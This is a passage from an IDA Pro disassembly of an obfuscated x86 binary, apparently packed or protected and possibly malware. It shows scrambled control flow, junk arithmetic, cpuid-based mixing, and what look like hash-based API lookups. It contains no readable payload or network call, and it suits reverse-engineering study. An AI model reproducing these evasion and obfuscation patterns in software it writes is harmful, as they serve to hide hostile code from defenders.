; END OF FUNCTION CHUNK FOR sub_424BE6
; =============== S U B R O U T I N E =======================================
sub_42E076 proc near ; CODE XREF: sub_423DFC:loc_42EE0C�p
; _7hdaygc1:0042EEA7�j
; FUNCTION CHUNK AT 004251B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004253C1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00427874 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DD14 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E779 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E8B8 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-4]
cmp dword ptr [eax], 0
jnz loc_42CDEC
loc_42E086: ; CODE XREF: sub_42C50D:loc_42CD19�j
jmp loc_427874
sub_42E076 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_177. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42E08C: ; CODE XREF: sub_425C3B:loc_423488�j
; DATA XREF: sub_42E32F+D�o
call sub_42D757
mov edx, 0A22F8A70h
call sub_42C763
mov ds:dword_427C84, eax
call sub_42D757
mov edx, 0A2CD59D9h
call sub_42C763
mov ds:dword_423B1C, eax
jmp nullsub_138
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42E0B9: ; CODE XREF: sub_42E283:loc_42528E�j
jnz loc_42DD98
jmp loc_42CB06
; END OF FUNCTION CHUNK FOR sub_42E283
; =============== S U B R O U T I N E =======================================
sub_42E0C4 proc near ; CODE XREF: sub_4291EA-389E�j
; _7hdaygc1:004281D5�j ...
; FUNCTION CHUNK AT 00426773 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00426ADD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F5E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428973 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428EB1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004290D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DF1A SIZE 00000016 BYTES
xchg edi, [esp+0]
pop edi
push 42C69EA4h
pop eax
and eax, ds:4000F7h
rol eax, 1Bh
test eax, 20h
jmp loc_426ADD
sub_42E0C4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E0E2 proc near ; DATA XREF: _7hdaygc1:00426CFB�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042F539 SIZE 00000014 BYTES
push edx
push 0E4FEBE7Fh
xchg esi, [esp+8+var_8]
mov edx, esi
pop esi
or edx, 5A6C9ECDh
jmp loc_42F539
sub_42E0E2 endp
; ---------------------------------------------------------------------------
xor edi, ebp
jmp loc_42E346
; ---------------------------------------------------------------------------
loc_42E100: ; CODE XREF: _7hdaygc1:0042C6CC�j
jnz loc_429777
or esi, ebx
cmp edx, edi
jmp loc_42AF40
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED4E
loc_42E10F: ; CODE XREF: sub_42ED4E:loc_42B22F�j
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
jmp loc_429369
; END OF FUNCTION CHUNK FOR sub_42ED4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_42E122: ; CODE XREF: sub_423752+BAC9�j
or eax, 22606F38h
xor eax, 0B67DEFBDh
cmp edi, eax
pop eax
jbe loc_426F9F
jmp loc_428DD2
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD68
loc_42E13C: ; CODE XREF: sub_42FD68:loc_425839�j
pop ecx
rol ecx, 1
jb loc_425773
or ecx, 4CE64C5Fh
jmp loc_425770
; END OF FUNCTION CHUNK FOR sub_42FD68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_42E150: ; CODE XREF: sub_424744:loc_4245E9�j
; sub_424744+479D�j
push esi
push 0F8FEB054h
pop esi
and esi, 0F3A5556h
test esi, 2000h
loc_42E163: ; CODE XREF: sub_423DDB+B40F�j
jmp loc_42F941
; END OF FUNCTION CHUNK FOR sub_424744
; =============== S U B R O U T I N E =======================================
sub_42E168 proc near ; CODE XREF: _7hdaygc1:004270B3�j
; sub_42F9D2+9�p
; FUNCTION CHUNK AT 00423E66 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
cpuid
xor [esi], ebx
push offset loc_42B80E
jmp loc_423E66
sub_42E168 endp
; ---------------------------------------------------------------------------
dw 0E04Ah
dword_42E17C dd 4060843Eh ; ---------------------------------------------------------------------------
loc_42E180: ; CODE XREF: _7hdaygc1:0042DF32�j
jmp loc_42E845
; ---------------------------------------------------------------------------
db 97h, 0A7h, 0DCh
dword_42E188 dd 263ADF2h ; sub_42A052+A�r ...
dword_42E18C dd 8308AD7Ch ; ---------------------------------------------------------------------------
loc_42E190: ; CODE XREF: _7hdaygc1:00427FBC�j
jmp loc_4260E4
; ---------------------------------------------------------------------------
db 0ACh, 76h, 4Bh
dword_42E198 dd 0B21BB419h, 39DB8D10h, 1D70D572h, 98C56h ; sub_42BB83+3�o ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CCF
loc_42E1A8: ; CODE XREF: sub_429CCF+13�j
jmp loc_42F888
; END OF FUNCTION CHUNK FOR sub_429CCF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42821A
loc_42E1AD: ; CODE XREF: sub_42821A-4A10�j
jmp loc_423056
; END OF FUNCTION CHUNK FOR sub_42821A
; ---------------------------------------------------------------------------
dw 0C932h
dword_42E1B4 dd 0D3991F2h ; ---------------------------------------------------------------------------
loc_42E1B8: ; CODE XREF: _7hdaygc1:004294F3�j
jmp loc_42A721
; ---------------------------------------------------------------------------
loc_42E1BD: ; CODE XREF: _7hdaygc1:00423D99�j
jmp loc_42BF7B
; ---------------------------------------------------------------------------
dw 0C20h
dword_42E1C4 dd 4F39F20Dh ; sub_424755:loc_42AFEB�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42E1C8: ; CODE XREF: sub_4288FE+7175�j
jmp loc_42D92F
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
test al, al
jz loc_427FA5
jmp loc_42FB99
; ---------------------------------------------------------------------------
loc_42E1DA: ; DATA XREF: sub_426B1A+4291�o
pop ecx
pop ebx
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_42E1DD: ; CODE XREF: sub_424CE0+7�j
jmp loc_429F63
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_42E1E2: ; CODE XREF: sub_4291A3-503D�j
; sub_4291A3-1281�j
mov eax, ds:dword_425154
call sub_42C119
loc_42E1EC: ; CODE XREF: sub_42CB0F+B�j
jmp loc_42D26D
; END OF FUNCTION CHUNK FOR sub_4291A3
; =============== S U B R O U T I N E =======================================
sub_42E1F1 proc near ; DATA XREF: sub_42E51C:loc_42CA79�o
; FUNCTION CHUNK AT 0042B29F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C023 SIZE 00000018 BYTES
push ebp
mov eax, [ebp-20h]
call sub_42A104
pop ecx
call sub_42C6A0
loc_42E200: ; CODE XREF: sub_42F1C6-4BDB�j
jmp loc_42C023
sub_42E1F1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E205 proc near ; CODE XREF: _7hdaygc1:0042922D�j
; _7hdaygc1:0042AE23�p
; FUNCTION CHUNK AT 0042981A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042B9B0 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xor eax, 7090F862h
add eax, ebp
jmp loc_42B9B0
sub_42E205 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_42E216: ; CODE XREF: sub_423752:loc_42F1B6�j
xchg ebp, edi
and esi, ebx
or ebx, ebp
jmp loc_42F930
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA74
loc_42E221: ; CODE XREF: sub_42DA74:loc_423528�j
rol eax, 0Ah
add eax, 0AC9A92ABh
xchg eax, [esp+4+var_4]
jmp loc_42EE11
; END OF FUNCTION CHUNK FOR sub_42DA74
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_42E233: ; CODE XREF: sub_42D002-8634�j
jmp loc_424176
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C48C
loc_42E238: ; CODE XREF: sub_42C48C:loc_42A4F8�j
cmp dword ptr [eax-0Ch], 4
jnz loc_42E24B
loc_42E242: ; CODE XREF: _7hdaygc1:0042C3BE�j
add dword ptr [ebp-8], 4
jmp loc_42F5F3
; ---------------------------------------------------------------------------
loc_42E24B: ; CODE XREF: sub_42C48C+1DB0�j
add dword ptr [ebp-8], 2
jmp loc_4258AC
; END OF FUNCTION CHUNK FOR sub_42C48C
; =============== S U B R O U T I N E =======================================
sub_42E254 proc near ; CODE XREF: sub_423648+5A9�p
; sub_423648+4DD0�p
; FUNCTION CHUNK AT 0042357A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042531C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042678C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427E2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042806D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429059 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429BF2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EE21 SIZE 00000010 BYTES
push ebp
jmp loc_42678C
sub_42E254 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_42E25A: ; CODE XREF: sub_4232C2:loc_428637�j
ja loc_42E67C
jmp loc_42D3E8
; END OF FUNCTION CHUNK FOR sub_4232C2
; =============== S U B R O U T I N E =======================================
sub_42E265 proc near ; DATA XREF: sub_42E205:loc_429820�o
mov ecx, [ebp-30h]
push offset sub_423A7D
jmp nullsub_175
sub_42E265 endp
; ---------------------------------------------------------------------------
loc_42E272: ; CODE XREF: _7hdaygc1:00429D09�j
push edx
mov edx, eax
xchg edx, [esp]
retn
; ---------------------------------------------------------------------------
loc_42E279: ; CODE XREF: _7hdaygc1:0042CD65�j
jmp loc_424C9D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424BE6
loc_42E27E: ; CODE XREF: sub_424BE6+2�j
jmp loc_42E05C
; END OF FUNCTION CHUNK FOR sub_424BE6
; =============== S U B R O U T I N E =======================================
sub_42E283 proc near ; CODE XREF: sub_42AFFE:loc_42E7C1�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004243A0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004244BA SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042528E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004255D4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425883 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426E23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042989F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00429AB5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A269 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A27B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A7DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A8D9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A8FB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042A9B5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042B2BF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B872 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C090 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C360 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042CB06 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042DD90 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042E0B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E2F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E53D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EB52 SIZE 00000005 BYTES
jns loc_42A27B
xor eax, eax
call sub_424DF3
jmp loc_42A8D9
sub_42E283 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF7
loc_42E296: ; CODE XREF: sub_42DBF7-307D�j
jmp nullsub_147
; END OF FUNCTION CHUNK FOR sub_42DBF7
; =============== S U B R O U T I N E =======================================
sub_42E29B proc near ; CODE XREF: sub_425E64-1811�p
; sub_42A607-4DE�j ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423C4F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425CE7 SIZE 00000011 BYTES
jnb sub_428342
push ebp
mov ebp, esp
push esi
mov esi, ecx
xchg esi, [esp+8+var_8]
mov esp, ebp
jmp loc_425CE7
sub_42E29B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6C3
loc_42E2B1: ; CODE XREF: sub_42A6C3:loc_428A58�j
pop eax
and eax, 388C274Ah
jnz loc_42EB6D
not ebp
loc_42E2C0: ; CODE XREF: _7hdaygc1:loc_429E2F�j
jbe loc_42DE95
ror esi, 11h
jmp loc_42EB6D
; END OF FUNCTION CHUNK FOR sub_42A6C3
; ---------------------------------------------------------------------------
loc_42E2CE: ; DATA XREF: sub_4291A3+40CB�o
push 0BF359D5Eh
pop ebx
rol ebx, 17h
push offset sub_426738
jmp loc_4252D8
; ---------------------------------------------------------------------------
locret_42E2E1: ; CODE XREF: _7hdaygc1:loc_424FE0�j
retn
; ---------------------------------------------------------------------------
dw 8A0Fh
dd 0FFFFCC4Eh, 7762D781h, 7FE9BDE4h
db 9Ch, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_170. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42E2F4 proc near ; DATA XREF: sub_425C2C+7C3F�o
pop ebp
retn
sub_42E2F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42E2F6: ; CODE XREF: sub_42E283-89F3�j
jmp loc_426E23
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
loc_42E2FB: ; CODE XREF: _7hdaygc1:0042BF0F�j
mov eax, [ebp+8]
push offset sub_42CA28
jmp loc_42EB4D
; ---------------------------------------------------------------------------
test al, al
jz nullsub_83
jmp loc_427360
; ---------------------------------------------------------------------------
loc_42E315: ; DATA XREF: sub_426941+1�o
mov ebp, esp
push ebp
mov ebp, ecx
xchg ebp, [esp]
mov esp, ebp
push offset sub_42D980
jmp locret_4247A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_164. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42E32A: ; CODE XREF: _7hdaygc1:004247F3�j
jmp loc_42B656
; =============== S U B R O U T I N E =======================================
sub_42E32F proc near ; CODE XREF: _7hdaygc1:0042BF06�p
; _7hdaygc1:0042D6B2�j
; FUNCTION CHUNK AT 004231BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429583 SIZE 00000012 BYTES
xchg ecx, [esp+0]
pop ecx
jno loc_429583
mov byte ptr [eax], 0C3h
push offset loc_42E08C
jmp loc_4231BC
sub_42E32F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42E346: ; CODE XREF: _7hdaygc1:0042E0FB�j
popf
; =============== S U B R O U T I N E =======================================
sub_42E347 proc near ; CODE XREF: sub_42653E+1F8D�p
; FUNCTION CHUNK AT 0042C427 SIZE 0000000C BYTES
xchg ebx, [esp+0]
pop ebx
call sub_4237DA
cmp eax, [ebp-8]
jnz loc_4237C9
mov eax, [ebp-14h]
mov eax, [eax+24h]
jmp loc_42C427
sub_42E347 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42E364: ; DATA XREF: sub_42E481+B�o
mov al, 1
push offset sub_42EFBC
jmp loc_42F446
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_42E370: ; CODE XREF: sub_42567E:loc_4248D5�j
xor ebx, 1C625C11h
and edx, ebx
pop ebx
xor [esi], edx
cmp edi, 80000001h
jbe loc_426F9F
jmp loc_42C4A2
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
cmp ebp, 0BB8A7DBEh
jmp loc_42535A
; ---------------------------------------------------------------------------
loc_42E397: ; DATA XREF: sub_425735:loc_425DF6�o
jnz loc_4243FB
mov eax, ebx
jmp loc_4243FD
; =============== S U B R O U T I N E =======================================
sub_42E3A4 proc near ; CODE XREF: _7hdaygc1:00423727�p
; sub_42F9D2-C12C�p ...
mov eax, [ebx+ecx]
xor eax, [ebx+ecx+4]
cmp eax, 7C61090Eh
retn
sub_42E3A4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42E3B1: ; CODE XREF: sub_4291EA+2BA3�j
jmp loc_42819F
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42874A
loc_42E3B6: ; CODE XREF: sub_42874A+F�j
pop esi
sub esi, 80880C81h
add esi, 4EDDBD18h
add esi, ebp
push edi
push 83390CB0h
jmp loc_4249D3
; END OF FUNCTION CHUNK FOR sub_42874A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B1A
loc_42E3D0: ; CODE XREF: sub_426B1A:loc_42B10C�j
push offset loc_42ADA0
jmp nullsub_87
; END OF FUNCTION CHUNK FOR sub_426B1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_42E3DA: ; CODE XREF: sub_42D84A:loc_42C8BC�j
or eax, 1EB6AFF7h
sub eax, 0DBF0EBD4h
xor eax, 42C5D423h
popf
xchg eax, [esp+8+var_8]
call sub_428C3B
push edx
jmp loc_42E738
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
loc_42E3FB: ; CODE XREF: _7hdaygc1:00425F16�j
; _7hdaygc1:0042C6D2�j
mov esi, edi
jmp loc_42CCA7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_42E402: ; CODE XREF: sub_42D84A:loc_4297D9�j
pop ecx
sub ecx, 3A19A9C3h
rol ecx, 0Fh
xor ecx, 0B456EB3Ah
jns loc_42720A
loc_42E418: ; CODE XREF: _7hdaygc1:0042CFFD�j
jmp loc_428321
; END OF FUNCTION CHUNK FOR sub_42D84A
; =============== S U B R O U T I N E =======================================
sub_42E41D proc near ; CODE XREF: _7hdaygc1:0042C90D�j
; sub_42CDF7+9�p
xchg edi, [esp+0]
pop edi
jnz loc_42F5D2
call sub_42D757
mov edx, 0B9726E5Ah
call sub_42C1AF
jmp loc_42C011
sub_42E41D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E43B proc near ; DATA XREF: _7hdaygc1:00426F3C�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425864 SIZE 00000005 BYTES
push ebx
push 4CB79DD2h
pop ebx
and ebx, 0A7E12F6Eh
add ebx, 0FB5EF2BEh
xchg ebx, [esp+4+var_4]
call sub_426941
push ecx
jmp loc_425864
sub_42E43B endp
; ---------------------------------------------------------------------------
push 0A9C59F1Fh
jmp sub_42EBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426EBD
loc_42E466: ; CODE XREF: sub_426EBD:loc_4235FE�j
xor ebx, 44D517A8h
xchg ebx, [esp+4+var_4]
push edx
push 7499FFA3h
pop edx
sub edx, 0FD19EE31h
jmp loc_428B2B
; END OF FUNCTION CHUNK FOR sub_426EBD
; =============== S U B R O U T I N E =======================================
sub_42E481 proc near ; CODE XREF: sub_424981+5�p
; _7hdaygc1:0042C4AF�j
; FUNCTION CHUNK AT 0042B990 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov ebp, [eax]
add eax, 4
mov edx, [eax]
push offset loc_42E364
jmp loc_42B990
sub_42E481 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EBB
loc_42E496: ; CODE XREF: sub_429EBB:loc_426711�j
add [esi], ebx
xor [esi], edx
jmp loc_42AE63
; END OF FUNCTION CHUNK FOR sub_429EBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42E49F: ; CODE XREF: sub_429318-3E24�j
; sub_42821A+B�j ...
xor eax, eax
call sub_42D471
push eax
push ecx
push 542E2822h
jmp loc_42FD46
; END OF FUNCTION CHUNK FOR sub_429318
; =============== S U B R O U T I N E =======================================
sub_42E4B2 proc near ; CODE XREF: _7hdaygc1:0042628F�j
; sub_42AA07�p
; FUNCTION CHUNK AT 0042F1DD SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
mov ebp, esp
jno loc_42F1DD
add esp, 0FFFFFFF8h
mov [ebp-8], edx
jmp loc_4267F1
sub_42E4B2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42E4CA: ; CODE XREF: sub_425F27:loc_42568C�j
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263AB
loc_42E4CD: ; CODE XREF: sub_4263AB:loc_428DDC�j
push ecx
mov ecx, ebp
jmp loc_42908E
; END OF FUNCTION CHUNK FOR sub_4263AB
; ---------------------------------------------------------------------------
loc_42E4D5: ; CODE XREF: _7hdaygc1:00426BC6�j
sub edi, esi
; =============== S U B R O U T I N E =======================================
sub_42E4D7 proc near ; CODE XREF: sub_42B265:loc_4293BF�p
; FUNCTION CHUNK AT 00424420 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424D0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429283 SIZE 00000015 BYTES
xchg ebx, [esp+0]
pop ebx
push eax
push 6EB4603Ch
jmp loc_424D0F
sub_42E4D7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42E4E6: ; CODE XREF: sub_42EBD6-5475�j
jb loc_42A4BB
push 0A54D8193h
loc_42E4F1: ; CODE XREF: sub_42EBD6:loc_42F5B6�j
cmp ebx, 68747541h
jz loc_42A394
jmp loc_42E5D6
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA6A
loc_42E502: ; CODE XREF: sub_42EA6A+13�j
jz loc_42620C
jmp loc_42A62B
; END OF FUNCTION CHUNK FOR sub_42EA6A
; ---------------------------------------------------------------------------
loc_42E50D: ; DATA XREF: sub_42ED2A-94E9�o
mov al, [eax]
mov [ebp-9], al
mov al, [ebp-0Ah]
and al, 7
jmp loc_423C33
; =============== S U B R O U T I N E =======================================
sub_42E51C proc near ; CODE XREF: _7hdaygc1:0042A68C�j
; sub_42BCF6+8�p
; FUNCTION CHUNK AT 00428689 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A775 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042C6AC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042CA79 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FA7C SIZE 00000015 BYTES
xchg ecx, [esp+0]
pop ecx
mov dword ptr [ebp-18h], 0
loc_42E527: ; CODE XREF: sub_4253A0-1BD1�j
mov eax, [ebp-4]
call sub_42DEA0
loc_42E52F: ; CODE XREF: sub_423648+4CC3�j
jmp loc_428689
sub_42E51C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dword_42E534 dd 404DA3BEh ; sub_42D9E1+21E3�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_42E538: ; CODE XREF: sub_42EE8A+16�j
jmp loc_429374
; END OF FUNCTION CHUNK FOR sub_42EE8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42E53D: ; CODE XREF: sub_42E283-3977�j
jmp loc_4244BA
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
dw 2AACh
dword_42E544 dd 9481F20h ; sub_42862C+4�w ...
dword_42E548 dd 20C6EF9h dword_42E54C dd 2805DF2h ; _7hdaygc1:0042DABE�w
; ---------------------------------------------------------------------------
loc_42E550: ; CODE XREF: _7hdaygc1:00428265�j
jmp loc_424B98
; ---------------------------------------------------------------------------
loc_42E555: ; CODE XREF: _7hdaygc1:0042E94A�j
or ecx, 1B07AD6Ah
xor edi, ecx
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42E55D: ; CODE XREF: sub_424AE1:loc_42E939�j
xor eax, 3DEBB8EAh
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
jmp loc_4238D7
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_42E572: ; CODE XREF: sub_42F05E-4A1F�j
ror ebp, 1Eh
mov edi, 39F861B7h
loc_42E57A: ; CODE XREF: _7hdaygc1:loc_42FADC�j
mov eax, [ebp-4]
call sub_42E58D
retn
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_42E583: ; CODE XREF: sub_423410+9BB�j
jmp loc_42472D
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
loc_42E588: ; CODE XREF: _7hdaygc1:00423334�j
jmp loc_42BFAE
; =============== S U B R O U T I N E =======================================
sub_42E58D proc near ; CODE XREF: sub_42F05E-AE1�p
; FUNCTION CHUNK AT 0042703C SIZE 00000005 BYTES
push ebp
jmp loc_42703C
sub_42E58D endp
; ---------------------------------------------------------------------------
loc_42E593: ; CODE XREF: _7hdaygc1:0042C0E9�j
push eax
call sub_42B74A
; START OF FUNCTION CHUNK FOR sub_42616B
loc_42E599: ; CODE XREF: sub_42616B+66E9�j
jmp sub_42A94C
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
loc_42E59E: ; CODE XREF: _7hdaygc1:0042A1CF�j
jmp locret_42F973
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_213. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42E5A4: ; CODE XREF: _7hdaygc1:0042D462�j
jmp loc_42E8A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42E5A9: ; CODE XREF: sub_425F27+2EFF�j
jmp loc_42B44A
; END OF FUNCTION CHUNK FOR sub_425F27
; =============== S U B R O U T I N E =======================================
sub_42E5AE proc near ; CODE XREF: _7hdaygc1:0042439B�j
; _7hdaygc1:0042F5EE�p
xchg edx, [esp+0]
pop edx
add edx, 0F5E7D0AEh
call sub_42C1AF
push eax
loc_42E5BE: ; CODE XREF: _7hdaygc1:0042B2B4�j
ror eax, 19h
mov ds:dword_42E17C, eax
jmp nullsub_176
sub_42E5AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor esi, ebp
test ecx, ebx
jmp loc_42F961
; ---------------------------------------------------------------------------
locret_42E5D5: ; CODE XREF: _7hdaygc1:loc_42EA52�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42E5D6: ; CODE XREF: sub_42EBD6-6D9�j
jmp loc_42FBEC
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42E5DB: ; CODE XREF: sub_423DFC+9BA5�j
jmp loc_4270D4
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425647
loc_42E5E0: ; CODE XREF: sub_425647+9�j
jmp loc_423584
; END OF FUNCTION CHUNK FOR sub_425647
; ---------------------------------------------------------------------------
loc_42E5E5: ; CODE XREF: _7hdaygc1:004230F8�j
jmp loc_427070
; ---------------------------------------------------------------------------
loc_42E5EA: ; CODE XREF: _7hdaygc1:0042C3AE�j
inc dword ptr [ebp-8]
push offset sub_429B36
jmp loc_429EFB
; ---------------------------------------------------------------------------
cmp esi, edx
jmp loc_42B4D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42E5FE: ; CODE XREF: sub_423DFC:loc_42AD64�j
mov [ebp-0Ch], eax
add dword ptr [ebp-4], 4
loc_42E605: ; CODE XREF: sub_42D245:loc_429B30�j
jno loc_42EE0C
mov eax, [ebp-4]
